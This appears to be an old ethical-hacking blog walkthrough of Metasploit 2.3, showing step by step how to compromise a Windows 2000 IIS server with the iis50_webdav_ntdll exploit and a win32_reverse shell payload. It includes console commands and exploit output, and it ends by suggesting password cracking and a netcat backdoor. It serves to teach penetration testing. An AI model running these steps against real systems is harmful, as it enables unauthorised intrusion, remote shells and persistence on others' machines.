Metasploit Tutorial/walkthrough Part 2

Example of Using Metasploit™

The goal of the exercise below is to become familiar with the Metasploit™ framework and to perform a compromise of a Windows 2000 system.


These steps can be done easily from most popular bootable CD Linux distributions. The steps below are for use with the Whoppix/Whax distro (or now known or replaced by backtrack for those of you who are not old like me the steps are the same just ofc replace the correct locations for whatever distro you use).

If you want to take a trip down memory lane here you go 2005 ish is when these were last updated :P (otherwise just use Back|Track)
Whopix - knopix based
Download Whoppix Linux 2.7.1
Whax - Slax based
Download WHAX 3.0 for Linux - WHAX is the natural evolution of WHoppix - a live cd, standalone penetratin testing toolkit. - Softpedia

To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit™ directory. To do this from a command prompt type:

cd /KNOPPIX/pentest/exploits/framework-2.3/

Launch the Metasploit™ console. To do this, from a command line type the following:

# " ./msfconsole "

Pick which exploit to use

Once the msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stub from the following commands:

<!--[if !supportLists]-->use
<!--[if !supportLists]-->show
<!--[if !supportLists]--><!--[endif]-->info

The use command will tell the utility exactly which exploit to select.

The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below.

The info command provides details about a specific module.


Start by entering "show exploits" to see the list of exploits available. Pretty impressive, huh? Many of the exploits listed here are going to work against the target servers and in fact we use many of these exploits in the ethical hacking course.
If you need some hints, I recommend starting with the "iis50_webdav_ntdll" exploit.
To actually start the exploit type "use iis50_webdav_ntdll"
After use – configure options

We’ve selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options.
Start by typing

show options

This will show you the command requirements to run the exploit.
These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port that the vulnerable function is running on)
To set these options type

set RHOST <your partner machines IP address>

and press enter. On the next line type

set RPORT 80

Is the exploit going to work?

We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out.
To perform the check type

check

.


This may not work on all exploits. This will see if the server or target appears vulnerable.
For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary. If you want to know why this is important sign-up for the ethical hacking courses. Here are steps if you use an exploit that requires you to select a target.
If your check is unsuccessful, you may need to select some additional options about the target that you are hoping to compromise. This usually includes a description of the OS and the service pack level of the system. In some modules there is a brute force option. What is being configured here is the memory offset that the utility will use to find the vulnerable function. The brute force option will try many memory offsets, but the result will be a lot less stealthy if you are unsuccessful. If you enter

show targets

you should see something like the below.

msf iis50_webdav_ntdll > show targets
Supported Exploit Targets
=========================
0 Windows 2000 Bruteforce

What do we want a successful attack to do?

What Metasploit™ calls a payload, many others refer to as shell code or opcode. This is the code that we wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going to be service pack dependant, OS dependant, and architecture (i386) dependant as well. This means that most of the payloads in the Metasploit™ framework will work for only certain OS’s and on certain processors. Even if you select an appropriate payload you will have to configure options to get the payload to work. The most frequently used type of shell code is code that generates a reverse shell from the compromised system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to the payloads section. If you type

show payloads

you should see a response like the below .

msf iis50_webdav_ntdll > show payloads
Metasploit™ Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

In this case the best shell to try will be the win32_reverse payload. To do this type

set PAYLOAD win32_reverse

This payload requires some options. These include the exit function, the local host and the local port.
To see these options type

show options

you should see something like the below:

msf iis50_webdav_ntdll(win32_reverse) > show options

Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows 2000 Bruteforce

To set the missing options, we will use the set command like above. Before we can set these values we need to know what they are. To find your local IP address open another shell window, by either right clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you right click on the desktop look for the shell option. If you do this step right you should see a new shell box (kinda sorta like a DOS command prompt box on XP) appear.


Once you have the box open type

ifconfig

This will show the information for all of the interfaces for you linux system. This is the equivalent of the ipconfig command in Windows. You should see something like the following:

[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:03:25:13:43:F2
inet addr:10.5.14.173 Bcast:10.5.15.255 Mask:255.255.252.0
inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4563 errors:0 dropped:0 overruns:0 frame:0
TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3696580 (3.5 MiB) TX bytes:325618 (317.9 KiB)
Interrupt:193 Base address:0x4c00

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:213 errors:0 dropped:0 overruns:0 frame:0
TX packets:213 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:49707 (48.5 KiB) TX bytes:49707 (48.5 KiB)

What we are interested in, is the value for the eth0 (or whatever is active on your system it could be eth1 or some other interface), but you should see the value inet addr: and your IP address listed next to this. In the example above the IP address is 10.5.14.173. If you look closely you'll see that it is there. GO ahead and look – no one will laugh I promise.
Once we know this value we will set it with the set command.



To do this type

set LHOST <your IP address>

This is all that really needs to be set, but for luck I always make one more change – I set the local port to 5555. This is just for superstition. I'm not going to give you exact instructions on how to do this, but if you can figure it out – be my guest and change it.
This payload with this exploit had no advanced options, but

to check for other exploits type

show advanced

You should see something like the below.

msf iis50_webdav_ntdll(win32_reverse) > show advanced
Exploit and Payload Options
===========================

Exploit (Msf::Exploit::iis50_webdav_ntdll):
-------------------------------------------
Payload (Msf::Payload::win32_reverse):
--------------------------------------

Making it all happen

Now is the time to see the fruits of your labor. This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable. If all goes well you will own the box.
To do this type

exploit

Once you launch the exploit it may take some time. The exploit is trying to brute force the memory offset for the vulnerable function. If you don't know what this means and want to learn – see the ethical hacking class as listed above.
If you've done everything right you should see something like the below.

• Starting Reverse Handler.
• Connecting to web server. OK
• Trying return address 0x004e004f...
• Sending request (65739 bytes)
• Connecting to web server. OK
• Trying return address 0x00420041...
• Sending request (65739 bytes)
• Connecting to web server. OK
• Trying return address 0x00430041...
• Sending request (65739 bytes)
• Connecting to web server. OK[
• Trying return address 0x00c10041...
• Sending request (65739 bytes)
• Connecting to web server. OK
• Trying return address 0x00c30041...
• Sending request (65739 bytes)
• Connecting to web server. OK
• Trying return address 0x00c90041...
• Sending request (65739 bytes)

If you are successful you'll have a remote connection into the target machine and can do whatever you want. Once you've done this and received the prompt for the other system you "own the box". I won't tell you what to do next, after all where is the fun in that. Don't trash the system too bad if you want to exploit it again. You might want to try to crack the passwords– or you can create your own netcat backdoor.
Metasploit™ – available from http://www.Metasploit.com
It is not essential that the user boot a linux CD. To try out the framework on a Windows system, The Metasploit Project does provide a Windows installer on their web site.

Posted in: Ethical Hacking,Networking,Security